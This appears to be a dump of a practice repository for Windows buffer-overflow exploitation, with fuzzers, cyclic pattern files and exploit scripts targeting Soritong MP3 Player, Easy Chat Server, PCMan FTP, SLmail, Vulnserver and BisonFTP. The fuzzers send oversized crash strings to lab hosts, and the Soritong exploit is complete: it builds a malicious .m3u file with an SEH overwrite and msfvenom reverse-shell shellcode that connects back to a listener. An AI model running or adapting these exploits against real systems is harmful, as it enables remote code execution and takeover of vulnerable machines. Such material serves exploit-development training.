├── SEH-Overflow ├── Soritong-MP3-Player-1.0 │ ├── fuzzer.py │ ├── fuzzer_offset.py │ ├── pattern.txt │ └── exploit.py └── Easy-Chat-Server-3.1 │ ├── fuzzer.py │ ├── fuzzer_offset.py │ ├── pattern.txt │ └── exploit.py ├── PCMan-FTP-Server-2.0.7 ├── fuzzer.py ├── fuzzer_offset.py ├── exploit.py └── pattern.txt ├── SLmail-5.5-POP3(PASS) ├── fuzzer.py ├── fuzzer_offset.py ├── pattern.txt └── exploit.py ├── ROP-Chain └── Vulnserver │ ├── fuzzer.py │ ├── pattern.txt │ └── exploit.py └── Egg-Hunter └── BisonFTP-Server-3.5 ├── fuzzer.py ├── fuzzer_offset.py ├── pattern.txt ├── exploit.py └── staged_exploit.py /SEH-Overflow/Soritong-MP3-Player-1.0/fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import sys 4 | 5 | buf = "\x41" * 1000 6 | 7 | file = open(sys.argv[1],'a') # save file with .m3u extension 8 | 9 | file.write(buf) 10 | file.close() 11 | -------------------------------------------------------------------------------- /SEH-Overflow/Soritong-MP3-Player-1.0/fuzzer_offset.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import sys 4 | 5 | pattern = open("pattern.txt", "r").read(1000) 6 | 7 | file = open(sys.argv[1],'a') # save file with .m3u extension 8 | 9 | file.write(pattern) 10 | file.close() 11 | -------------------------------------------------------------------------------- /SEH-Overflow/Easy-Chat-Server-3.1/fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | 5 | ip = "192.168.56.132" 6 | port = 80 7 | 8 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 9 | 10 | buf = '\x41' * 2000 11 | request = "GET /chat.ghp?username=" + buf + "&password=12345" + "&room=1&sex=1 HTTP/1.1\r\n" # Request intercepted using burpsuite 12 | request += "Host: 127.0.0.1\r\n" 13 | s.connect((ip,port)) 14 | request += "\r\n\r\n" 15 | s.send(bytes(request,'latin-1')) 16 | print("%d bytes has been sent to the target \n" % len(request)) 17 | s.close() 18 | -------------------------------------------------------------------------------- /SEH-Overflow/Easy-Chat-Server-3.1/fuzzer_offset.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | 5 | ip = "192.168.56.132" 6 | port = 80 7 | 8 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 9 | 10 | pattern = open("pattern.txt","r").read(2000) 11 | request = "GET /chat.ghp?username=" + pattern + "&password=12345" + "&room=1&sex=1 HTTP/1.1\r\n" 12 | request += "Host: 127.0.0.1\r\n" 13 | s.connect((ip,port)) 14 | request += "\r\n\r\n" 15 | s.send(bytes(request,'latin-1')) 16 | print("%d bytes has been sent to the target \n" % len(request)) 17 | s.close() 18 | 19 | -------------------------------------------------------------------------------- /PCMan-FTP-Server-2.0.7/fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | import sys 5 | 6 | 7 | def connect(): 8 | global s 9 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Creates a socket for TCP connection 10 | s.connect((sys.argv[1],int(sys.argv[2]))) # Takes two arguments IP and port 11 | s.recv(1024) 12 | 13 | def fuzzer(): 14 | counter = 0 15 | array = [] 16 | while len(array) <=30: 17 | counter += 200 18 | array.append("\x41" * counter) 19 | for crash in array: 20 | s.send(bytes(crash,'latin-1')) 21 | print("%d bytes has been sended to the target \n" % len(crash)) 22 | 23 | def main(): 24 | connect() 25 | fuzzer() 26 | 27 | main() 28 | -------------------------------------------------------------------------------- /SLmail-5.5-POP3(PASS)/fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | import sys 5 | 6 | ip = "192.168.56.133" 7 | port = 110 8 | #EIP overwritten after sending 3000 chars 9 | def fuzzer(): 10 | global s 11 | counter = 0 12 | array = [] 13 | while len(array) <=30: 14 | counter += 200 15 | array.append("A" * counter) 16 | for crash in array: 17 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Creates a socket for TCP connection 18 | s.connect((ip,port)) 19 | print(s.recv(1024)) 20 | s.send(b'USER hacker\r\n') 21 | print(s.recv(1024)) 22 | print("[%d] bytes has been sended to the target \n" % len(crash)) 23 | s.send(bytes('PASS ' + crash + '\r\n', encoding='utf8')) 24 | s.recv(1024) 25 | s.close() 26 | 27 | def main(): 28 | fuzzer() 29 | 30 | main() 31 | -------------------------------------------------------------------------------- /PCMan-FTP-Server-2.0.7/fuzzer_offset.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | import sys 5 | 6 | 7 | def connect(): 8 | global s 9 | pattern = open("pattern.txt","r").read(6200) #Opens pattern.txt file and reads the contents of the file up to 6200 bytes 10 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Creates a socket for TCP connection 11 | s.connect((sys.argv[1],int(sys.argv[2]))) # Connects to given ip and port by the user 12 | print(s.recv(1024)) # Prints to the screen the data recieved from the server when established the TCP connection 13 | s.send(bytes(pattern,'latin-1')) # Sends the payload 14 | print("%d bytes has been sended to the target \n" % len(pattern)) 15 | s.close() 16 | 17 | def main(): 18 | connect() 19 | 20 | if __name__ == "__main__": 21 | main() 22 | -------------------------------------------------------------------------------- /SLmail-5.5-POP3(PASS)/fuzzer_offset.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | import sys 5 | 6 | ip = "192.168.56.133" 7 | port = 110 8 | 9 | def connect(): 10 | global s 11 | pattern = open("pattern.txt","r").read(3000) #Opens pattern.txt file and reads the contents of the file up to 6200 bytes 12 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Creates a socket for TCP connection 13 | s.connect((ip,port)) # Connects to given ip and port by the user 14 | print(s.recv(1024)) 15 | s.send(b'USER hacker\r\n') 16 | print(s.recv(1024)) 17 | print("[%d] bytes has been sended to the target \n" % len(pattern)) 18 | s.send(bytes('PASS ' + pattern + '\r\n', encoding='utf8')) 19 | s.recv(1024) 20 | s.close() 21 | 22 | def fuzz(): 23 | connect() 24 | 25 | if __name__ == "__main__": 26 | fuzz() 27 | -------------------------------------------------------------------------------- /ROP-Chain/Vulnserver/fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | import sys 5 | import os 6 | 7 | ip = "192.168.56.133" 8 | port = 9999 9 | global s 10 | 11 | 12 | def fuzzer(): 13 | fuzz = "\x41" * 3000 14 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 15 | s.connect((ip,port)) 16 | print(s.recv(1024)) 17 | s.send(bytes('TRUN .' + fuzz + '\r\n', 'latin-1')) 18 | s.recv(1024) 19 | s.send(b'EXIT\r\n') 20 | s.recv(1024) 21 | s.close() 22 | sys.exit() 23 | 24 | def offset(): 25 | pattern = open("pattern.txt","r").read(3000) 26 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 27 | s.connect((ip,port)) 28 | print(s.recv(1024)) 29 | s.send(bytes('TRUN .' + pattern + '\r\n', 'latin-1')) 30 | s.recv(1024) 31 | s.send(b'EXIT\r\n') 32 | s.recv(1024) 33 | s.close() 34 | sys.exit() 35 | 36 | if __name__ == "__main__": 37 | #fuzzer() 38 | offset() 39 | -------------------------------------------------------------------------------- /Egg-Hunter/BisonFTP-Server-3.5/fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | import sys 5 | import time 6 | 7 | ip = "192.168.56.132" 8 | port = 21 9 | #EIP overwritten after sending 1500 chars 10 | def fuzzer(): 11 | global s 12 | counter = 1500 13 | array = [] 14 | while len(array) <=30: 15 | array.append("A" * counter) 16 | for crash in array: 17 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Creates a socket for TCP connection 18 | s.connect((ip,port)) 19 | print(s.recv(1024)) 20 | time.sleep(2) 21 | s.recv(2000) 22 | s.send(b'USER anonymous\r\n') 23 | print(s.recv(2000)) 24 | s.send(b'PASS anonymous\r\n') 25 | print(s.recv(2000)) 26 | s.send(bytes('ABOR ' + crash + '\r\n','latin-1')) 27 | print("[%d] bytes has been sent to the target \n" % len(crash)) 28 | sys.exit() 29 | s.close() 30 | 31 | def main(): 32 | fuzzer() 33 | 34 | main() 35 | -------------------------------------------------------------------------------- /Egg-Hunter/BisonFTP-Server-3.5/fuzzer_offset.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | import sys 5 | import time 6 | 7 | ip = "192.168.56.132" 8 | port = 21 9 | #EIP overwritten after sending 1500 chars 10 | def fuzzer(): 11 | global s 12 | pattern = open("pattern.txt","r").read(1500) # Read existing pattern.txt file which contains cyclic pattern created by pattern_create.rb script 13 | 14 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Creates a socket for TCP connection 15 | s.connect((ip,port)) 16 | print(s.recv(1024)) 17 | time.sleep(2) 18 | s.recv(2000) 19 | s.send(b'USER anonymous\r\n') 20 | print(s.recv(2000)) 21 | s.send(b'PASS anonymous\r\n') 22 | print(s.recv(2000)) 23 | s.send(bytes('ABOR ' + pattern + '\r\n','latin-1')) 24 | print("[%d] bytes has been sent to the target \n" % len(pattern)) 25 | sys.exit() 26 | s.close() 27 | 28 | def main(): 29 | fuzzer() 30 | 31 | main() 32 | -------------------------------------------------------------------------------- /SEH-Overflow/Soritong-MP3-Player-1.0/pattern.txt: -------------------------------------------------------------------------------- 1 | Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B 2 | -------------------------------------------------------------------------------- /Egg-Hunter/BisonFTP-Server-3.5/pattern.txt: -------------------------------------------------------------------------------- 1 | Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9 2 | 3 | -------------------------------------------------------------------------------- /SEH-Overflow/Easy-Chat-Server-3.1/pattern.txt: -------------------------------------------------------------------------------- 1 | Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co 2 | -------------------------------------------------------------------------------- /SEH-Overflow/Soritong-MP3-Player-1.0/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import sys 4 | # After 264 bytes we reach SEH and we can overwrite it 5 | # After 260 bytes we reach Next-SEH and we can overwrite it 6 | # Bad chars = \x00\x0a\x0d\x20 7 | # Msfvenom payload: 8 | # msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread LHOST=192.168.56.131 LPORT=443 -f c -b '\x00\x0a\x0d\x20' 9 | 10 | shellcode = ( 11 | "\xba\xe6\xaa\x24\x1f\xdb\xc7\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1" 12 | "\x52\x83\xee\xfc\x31\x56\x0e\x03\xb0\xa4\xc6\xea\xc0\x51\x84" 13 | "\x15\x38\xa2\xe9\x9c\xdd\x93\x29\xfa\x96\x84\x99\x88\xfa\x28" 14 | "\x51\xdc\xee\xbb\x17\xc9\x01\x0b\x9d\x2f\x2c\x8c\x8e\x0c\x2f" 15 | "\x0e\xcd\x40\x8f\x2f\x1e\x95\xce\x68\x43\x54\x82\x21\x0f\xcb" 16 | "\x32\x45\x45\xd0\xb9\x15\x4b\x50\x5e\xed\x6a\x71\xf1\x65\x35" 17 | "\x51\xf0\xaa\x4d\xd8\xea\xaf\x68\x92\x81\x04\x06\x25\x43\x55" 18 | "\xe7\x8a\xaa\x59\x1a\xd2\xeb\x5e\xc5\xa1\x05\x9d\x78\xb2\xd2" 19 | "\xdf\xa6\x37\xc0\x78\x2c\xef\x2c\x78\xe1\x76\xa7\x76\x4e\xfc" 20 | "\xef\x9a\x51\xd1\x84\xa7\xda\xd4\x4a\x2e\x98\xf2\x4e\x6a\x7a" 21 | "\x9a\xd7\xd6\x2d\xa3\x07\xb9\x92\x01\x4c\x54\xc6\x3b\x0f\x31" 22 | "\x2b\x76\xaf\xc1\x23\x01\xdc\xf3\xec\xb9\x4a\xb8\x65\x64\x8d" 23 | "\xbf\x5f\xd0\x01\x3e\x60\x21\x08\x85\x34\x71\x22\x2c\x35\x1a" 24 | "\xb2\xd1\xe0\x8d\xe2\x7d\x5b\x6e\x52\x3e\x0b\x06\xb8\xb1\x74" 25 | "\x36\xc3\x1b\x1d\xdd\x3e\xcc\xe2\x8a\x78\x8f\x8b\xc8\x78\x8e" 26 | "\xf0\x44\x9e\xfa\x16\x01\x09\x93\x8f\x08\xc1\x02\x4f\x87\xac" 27 | "\x05\xdb\x24\x51\xcb\x2c\x40\x41\xbc\xdc\x1f\x3b\x6b\xe2\xb5" 28 | "\x53\xf7\x71\x52\xa3\x7e\x6a\xcd\xf4\xd7\x5c\x04\x90\xc5\xc7" 29 | "\xbe\x86\x17\x91\xf9\x02\xcc\x62\x07\x8b\x81\xdf\x23\x9b\x5f" 30 | "\xdf\x6f\xcf\x0f\xb6\x39\xb9\xe9\x60\x88\x13\xa0\xdf\x42\xf3" 31 | "\x35\x2c\x55\x85\x39\x79\x23\x69\x8b\xd4\x72\x96\x24\xb1\x72" 32 | "\xef\x58\x21\x7c\x3a\xd9\x41\x9f\xee\x14\xea\x06\x7b\x95\x77" 33 | "\xb9\x56\xda\x81\x3a\x52\xa3\x75\x22\x17\xa6\x32\xe4\xc4\xda" 34 | "\x2b\x81\xea\x49\x4b\x80") 35 | 36 | buf = "\x41" * 260 37 | nseh = "\xeb\x06\x90\x90" # JMP 6 bytes to our NOP sled 38 | seh = "\x6f\x12\x01\x10" # POP EDI POP ESI RETN (1001126F) found in Player.dll module 39 | nop = "\x90" * 20 40 | padding = "\x90" * 1180 41 | 42 | exploit = buf + nseh + seh + nop + shellcode + padding 43 | 44 | file = open(sys.argv[1],'ab') 45 | print("-------------------------------------------------------------\n") 46 | print("\t Proof Of Concept (PoC) by N3R0 \n") 47 | print("-------------------------------------------------------------\n") 48 | print("Generated file is [%d] bytes long\n\n" % len(exploit)) 49 | file.write(bytes(exploit,'latin-1')) 50 | file.close() 51 | -------------------------------------------------------------------------------- /ROP-Chain/Vulnserver/pattern.txt: -------------------------------------------------------------------------------- 1 | Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7C